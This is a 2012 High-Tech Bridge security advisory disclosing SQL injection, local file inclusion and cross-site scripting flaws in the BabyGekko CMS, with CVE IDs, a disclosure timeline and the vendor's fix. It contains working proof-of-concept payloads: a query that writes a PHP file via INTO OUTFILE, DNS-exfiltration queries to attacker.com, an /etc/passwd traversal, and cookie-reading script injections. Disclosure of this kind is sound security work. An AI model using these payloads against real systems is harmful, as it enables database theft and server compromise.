High-Tech Bridge Security Advisories are CVE Compatible    High-Tech Bridge Security Advisories CWE Compatibility    High-Tech Bridge Security Advisories CVSS Adopters
Vendor Statistics

286 software vendors have fixed 926 vulnerabilities in their products thanks to High-Tech Bridge Security Research Lab.

Patch Available Upon Disclosure

2014 Q1: 87%2013 Q2: 92%
2013 Q4: 67%2013 Q1: 100%
2013 Q3: 77%2012 Q4: 68%

Vendor Average Time to Patch

2014 Q1: 5 days 2013 Q2: 30 days
2013 Q4: 8 days 2013 Q1: 13 days
2013 Q3: 13 days 2012 Q4: 26 days

High-Tech Bridge Newsletter

Subscribe to our newsletter and receive some or all of our corporate news, invitations to security events or HTB Security Advisories – you choose what you want to receive.

Multiple vulnerabilities in BabyGekko

Advisory ID:HTB23122
Product:BabyGekko
Vendor: schlix web inc
Vulnerable Versions:1.2.2e and probably prior
Tested Version:1.2.2e
Advisory Publication:October 24, 2012 [without technical details]
Vendor Notification:October 24, 2012
Vendor Fix:November 4, 2012
Public Disclosure:November 14, 2012
Latest Update:November 13, 2012
Vulnerability Type:SQL Injection [CWE-89]
PHP File Inclusion [CWE-98]
Cross-Site Scripting [CWE-79]
CVE References:CVE-2012-5698
CVE-2012-5699
CVE-2012-5700
Risk Level:High
CVSSv2 Base Scores:6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BabyGekko, which can be exploited to include local PHP files, perform SQL Injection and Cross-Site Scripting (XSS) attacks.


1) Multiple SQL Injections in BabyGekko: CVE-2012-5698

Two SQL injections exist in BabyGekko administrator's panel but their exploitation demands administrator's privileges. However they can also be exploited by a non-authenticated malicious user via CSRF vector, because "/admin/index.php" script is also vulnerable to CSRF attack. In order to do so he has to make logged-in administrator visit a malicious page.

1.1 The vulnerability exists due to insufficient validation of input passed via the "keyword" parameter to "/admin/index.php" (when "app" is set to "users"). A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database.

The following PoC (Proof-of-Concept) will create (depending on web server and database permissions) a file "/tmp/.class.php" and writes "<?phpinfo()?>" into it:

http://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29%20UNION%20SELECT%201,2, 3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20

The second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", located on attacker controlled DNS server:

http://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHA R(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 )))) --

1.2 The vulnerability exists due to insufficient validation of input passed via the "query" parameter to "/admin/index.php". A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database.

The following PoC will create (depending on web server and database permissions) a file "/tmp/.class.php" and writes "<?phpinfo()?>" into it:

http://[host]/admin/index.php?app=html&action=getlistofusers&query=1%27%20union%20select%201,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE% 20%27/tmp/.class.php%27%20--%202%20

The second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", located on attacker controlled DNS server:

http://[host]/admin/index.php?app=html&action=getlistofusers&query=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHA R(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 )))) --


2) Local File Inclusion in BabyGekko: CVE-2012-5699

The vulnerability exists due to insufficient validation of input passed via the "app" parameter to "index.php". A remote attacker can include arbitrary files from local system using directory traversal sequences with NULL byte.

The following PoC will show the "/etc/passwd" file:

http://[host]/index.php?app=../../../../../../../etc/passwd%00

Second PoC demonstrates inclusion of "/tmp/.class.php" file created during exploitation of vulnerabilities 1.1 or 1.2. Depending on server configuration and permissions it will show the results of "phpinfo()" function execution:

http://[host]/index.php?app=../../../../../../../tmp/


3) Multiple Cross-Site Scripting (XSS) in BabyGekko: CVE-2012-5700

3.1 Input passed via the "id" parameter to "/admin/index.php" is not properly sanitized. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of vulnerable website.

The following PoC code demonstrates the vulnerability:

http://[host]/admin/index.php?app=templates&action=edititem&id=%22%3E%3Cscript%3Ealert%28document.co okie%29;%3C/script%3E

3.2 Insufficient sanitation of input passed via the "username" and "password" HTTP POST parameters to the "index.php" can be used to inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website. Successful exploitation of this vulnerability requires "loginbox" block to be activated.

The following PoC code demonstrates the vulnerability:

<form action="http://[host]/index.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="username" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="password" value='"><script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>


Solution:
Upgrade to BabyGekko 1.2.2f or 1.2.4

More Information:
http://www.babygekko.com/downloads/gekko_web_builder_v1.2.2f.zip
http://www.babygekko.com/site/news/general/babygekko-v1-2-4-has-been-released.html


ImmuniWeb® by High-Tech Bridge


References:
[1] High-Tech Bridge Advisory HTB23122 - https://www.htbridge.com/advisory/HTB23122 - Multiple vulnerabilities in BabyGekko.
[2] BabyGekko - http://www.babygekko.com - BabyGekko strives to deliver high quality websites and other web content fast and easy for all end users. It is a lightweight, extensible content management system platform for publishing websites, intranets, or blogs.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.